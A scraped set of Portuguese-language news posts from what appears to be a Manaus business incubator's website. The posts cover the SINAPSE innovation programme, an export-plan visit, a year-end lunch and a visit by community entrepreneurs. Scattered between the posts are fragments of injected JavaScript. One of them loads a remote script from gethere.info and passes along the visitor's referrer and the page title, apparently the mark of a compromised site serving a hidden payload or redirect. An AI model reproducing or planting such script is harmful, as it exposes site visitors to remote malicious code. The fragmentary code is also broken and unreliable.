Programa SINAPSE: CERTI atualiza resultados com agentes participantes

O diretor de operações do Instituto CERTI, Marco Giágio, mostra os resultados do SINAPSE aos agentes.
O diretor de operações do Instituto CERTI, Marco Giágio, mostra os resultados do SINAPSE aos agentes.

 

 

Os diretores de incubadoras de empresas e representantes de instituições de ensino universitário público e privado se reuniram, na tarde desta quinta-feira, 3, com o diretor de operações do Instituto CERTI Amazônia, Marco Antônio Giágio, para conhecer e atualizar os resultados do SINAPSE da Inovação, programa de empreendedorismo inovador iniciado pela Fundação de Amparo à Pesquisa do Amazonas (FAPEAM), em parceria com a Fundação Centros de Referência em Tecnologias Inovadoras (CERTI) do Estado de Santa Catarina.

 

 A reunião aconteceu na sede do próprio instituto CERTI, em Manaus, com todos os agentes que participam do programa de inovação. “Fizemos uma atualização do programa e a partir de abril, iniciaremos uma nova fase que é a pré-incubação, isto é, é o período no qual os empreendedores selecionados vão iniciar suas operações com recursos da FAPEAM, gerando retorno desse investimento por meio da geração de empregos, recolhimento de impostos e gerando novos investimentos”, disse Marco Giágio.

 

 Ainda segundo ele, 1.188 inscrições foram feitas no início do programa e 40 ideias inovadoras foram aprovadas, e os novos empreendedores são livres para escolher o local físico para montar o seu próprio negócio. “Agora, eles estão na etapa de formalização. E o local de operação é uma decisão exclusiva e independente de cada empreendedor. Há várias opções e que cada um avalie qual é a mais adequada”, orienta Marco, acrescentando que o sucesso do SINAPSE é devido à participação de todos os agentes e parceiros.

 

 Conforme o diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Barbosa Grosso, alguns acadêmicos que participam do SINAPSE já estiveram na incubadora para conhecer as instalações. “Nossa instituição apoia as iniciativas da FAPEAM e do programa SINAPSE. Portanto, estamos preparados a receber os novos empreendedores que queiram instalar-se aqui”, destacou.

Representantes de incubadoras de empresas e de instituições acadêmicas participam da reunião.
Representantes de incubadoras de empresas e de instituições acadêmicas participam da reunião.

 

Marco Giágio (ao fundo) mostra a relação dos aprovados e selecionados.
Marco Giágio (ao fundo) mostra a relação dos aprovados e selecionados.

 

 

O diretor executivo do CIDE, José Grosso (à isq.), conversa com Marco Giágio.
O diretor executivo do CIDE, José Grosso (à esq.), conversa com Marco Giágio.

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

Mdic convida empreendedores do CIDE para o PNCE

Durante a visita ao CIDE, representantes foram convidados a provar alguns produtos.
Durante a visita ao CIDE, representantes foram convidados a provar alguns produtos.

 

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) é uma das instituições contempladas com a visita de representantes do Ministério do Desenvolvimento, Indústria e Comércio Exterior (Mdic) e da Superintendência da Zona Franca de Manaus (Suframa) que estiveram nesta quinta-feira, 25, na incubadora, para convidar os empreendedores a participar do Plano Nacional da Cultura Exportadora (PNCE).

Segundo o analista de comércio exterior, Rafael Codeço, o PNCE envolve setores de Alimentação e Bebidas, Cosméticos, Produtos Regionais, Indústria Naval, entre outros. “Nesse primeiro momento, trata-se de uma visita à diretoria do CIDE para convidar os empreendedores instalados na incubadora a participar da reunião, na qual explicaremos o programa e, por conseguinte, que eles participem do programa”, disse.

Ainda conforme Codeço, a reunião deve ser agendada para este primeiro semestre, na própria incubadora de empresas.

Para o diretor executivo do CIDE, José Barbosa Grosso, os empresários instalados na incubadora têm potencial para participar do programa do Mdic. “Temos ótimos empreendedores, com produtos competitivos e criativos. Portanto, penso eu, que não teremos dificuldades para participar do PNCE”, conclui.

Representantes do Mdic e da Suframa conversam com empresários no CIDE.
Representantes do Mdic e da Suframa conversam com empresários no CIDE.

 

 

O diretor executivo do CIDE, José Grosso, foi o encarregado de mostrar as instalações do CIDE.
O diretor executivo do CIDE, José Grosso, foi o encarregado de mostrar as instalações do CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CIDE conclui as atividades de 2015 com almoço

Funcionários e empreendedores se confranternizam em almoço oferecido pelo CIDE.
Funcionários e empreendedores se confranternizam em almoço oferecido pelo CIDE.

 

 

 

Com muitos agradecimentos e novas metas para o ano de 2016, o diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Cunha Barbosa Grosso, concluiu, hoje, 18, as atividades da incubadora, com um almoço para os empreendedores instalados e funcionários da instituição.

Durante o almoço, houve partidas de dominó, brincadeiras e sorteio de uma cesta de doces, cortesia da Amazon Doces. “Desejo a todos os empresários instalados e aos funcionários que tanham fé, trabalhem com esperança de que o ano que vem será melhor do que o de 2015. Devemos ter força e vencer a crise com trabalho. Que todos os bons desejos se realizem”, disse José Grosso, diante dos funcionários e da gestora do Polo de Modas, conhecido como CIDE 2, Elizabeth Araújo, que aproveitou a ocasião para agradecer também a todos.

O diretor executivo, lembrou também que, hoje, o CIDE vai além de uma simples incubadora. “Tivemos várias visitas administrativas e de estudantes universitários, e de cursos técnicos da capital e do interior do Amazonas. Tivemos uma visita internacional dos estudantes da Universidade do Texas para conhecer nossa estrutura e as empresas incubadas. Então, isso significa que estamos sendo reconhecidos. Esperamos que as empresas continuem crescendo, divulguem seus produtos em feiras e que a incubadora continue auxiliando os que querem vir aqui”, finalizou o diretor, lembrando que a incubadora entra em recesso até o dia 3 de janeiro e retoma suas atividades no dia 4 do mesmo mês.

O diretor executivo, José Grosso, conversa com o proprietário da Sohervas.
O diretor executivo, José Grosso, conversa com o proprietário da Sohervas.
Empreendedores almoçam com os funcionários do CIDE.
Empreendedores almoçam com os funcionários do CIDE.
O almoço está servido.
O almoço está servido.

 

 

Jogo de dominó entre os convidados.
Jogo de dominó entre os convidados.

 

 

Conversa e brincadeiras entre os convidados.
Conversa e brincadeiras entre os convidados.

 

 

A gestora do "CIDE 2", Elizabeth Araújo (à direita), conversa com funcionários da incubadora.
A gestora do “CIDE 2”, Elizabeth Araújo (à direita), conversa com funcionários da incubadora.

 

 

Não faltaram as selfies.
Não faltaram as selfies.

 

 

Parada para a foto.
Parada para a foto.

 

 

Bom almoço para os convidados.
Bom almoço para os convidados.

 

 

Um churrasco para concluir as atividades.
Um churrasco para concluir as atividades.

 

 

A ganhadora da cesta de doces, oferecida pela Amazon Doces.
A ganhadora da cesta de doces, oferecida pela Amazon Doces.

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

Empreendedorismo comunitário busca parcerias no Cide

 

Empreendedores do interior do Amazonas com o diretor executivo do Cide.
Empreendedores do interior do Amazonas com o diretor executivo do Cide.

 

Aproximadamente 60 empreendedores de 20 municípios do Amazonas e participantes da Incubadora Itinerante de Negócios Sociais e Sustentáveis, da Fundação Amazonas Sustentável (FAS), estiveram, hoje, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), para ouvir palestra e conhecer empresas que trabalham com matéria-prima regional, como o açaí, pimenta e o cupuaçu, e realizar parcerias e negócios.

A maioria dos visitantes está associada a cooperativas do interior do Amazonas. “Negociando diretamente com o empreendedor, instalado no Cide, podemos depender menos do atravessador e melhorar o valor dos nossos produtos. É uma oportunidade que temos de fazer negócios também”, disse o presidente da Associação dos Produtores Agroextrativista da Reserva de Desenvolvimento Sustentável (RDS) do Rio Madeira, Hudson Oliveira.

O diretor executivo da incubadora, José Barbosa Grosso, foi o encarregado de apresentar os segmentos que existem no Cide. “Essas pessoas possuem empreendimentos de base comunitária e sustentável. Então, fazer contatos com outros empreendedores vai ajudá-las a melhorar seus negócios”, disse.

Depois da palestra sobre o processo de incubação no Cide, os visitantes conheceram quatro empresas ligadas diretamente com produtos amazônicos.

Empreendedores apoiados pela FAS, na frente do Cide.
Empreendedores apoiados pela FAS, na frente do Cide.
FAS1
O diretor executivo do Cide, José Barbosa Grosso, fala com os empreendedores do interior do Amazonas.

 

FAS2
Visitantes ouvem palestra, no auditrio do Cide.

 

FAS5
Visita na empresa Amazon Doces.
FAS6
Visita na empresa Temperos da Amazônia
FAS7
Visita na empresa de cosméticos Anna Morena.
FAS8
Visita na empresa de licores Sohervas da Amazônia.

 

 

 

 

 

 

 

if (document.currentScript) {